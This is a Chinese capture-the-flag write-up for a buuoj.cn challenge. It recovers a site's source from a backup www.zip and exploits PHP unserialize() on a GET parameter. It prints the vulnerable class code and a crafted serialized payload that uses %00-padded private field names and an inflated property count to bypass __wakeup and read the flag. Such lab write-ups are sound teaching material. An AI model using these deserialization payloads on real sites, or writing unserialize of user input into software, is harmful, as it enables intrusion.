平台:buuoj.cn
打开靶机挨打(卡爆了)
提示了有备份网站,尝试请求www.zip,成功得到源码。
解压得如下文件:
随便点点,flag.php自然是没有flag的,在index.php中只有一段:
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>
包含了class.php文件,get传入一个select参数再将其反序列化。那么考点可能就是php的反序列化漏洞
来看class.php:
include 'flag.php';
error_reporting(0);
class Name{
private $username = 'nonono';
private $password = 'yesyes';//声明两个私有变量
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;//初始化
}
function __wakeup(){
//反序列化时调用
$this->username = 'guest';
}
function __destruct(){
if ($this->password != 100) {
echo "NO!!!hacker!!!";
echo "You name is: ";
echo $this->username;echo "";
echo "You password is: ";
echo $this->password;echo "";
die();
}
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
//满足两个if得到flag
echo "hello my friend~~sorry i can't give you the flag!";
die();
}
}
}
?>
由此我们得知解题的条件:传入一个序列化的字符串,如果字符串经过反序列化之后username=admin,password=100,便会打印出flag。
那么构造序列化字符串。
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
}
$payload = new Name('admin',100);
echo serialize($payload);
//O:4:"Name":2:{s:14:" Name username";s:5:"admin";s:14:" Name password";i:100;}
到这再看看前面。
首先是第一个考点:
私有化声明,private是私有类型,该类型的属性或方法只能在该类中使用,在该类的实例、子类中、子类的实例中都不能调用私有类型的属性和方法。
私有字段的字段名在序列化时,类名和字段名前面都会加上\0的前缀(ASCII 码为 0 的字符(不可见字符))。字符串长度也包括所加前缀的长度。
也就是说usrname和password前面是有一个\0的,但是复制的时候会丢失,因此我们需要加上%00填补上去
O:4:"Name":2:{
s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
然后我们注意到,在执行__destruct得到flag之前,还会有一个__wakeup函数会在字符串反序列化执行之前把username重新赋值为guest,所以我们需要跳过它。
这里考察了一个php的漏洞:php-bugs-72663
反序列化时,如果反序列化字符串中表示属性个数的值大于真实属性个数时,会跳过 __wakeup 函数的执行。
所以这里我们把name属性的个数在字符串中改一下就行
O:4:"Name":3:{
s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}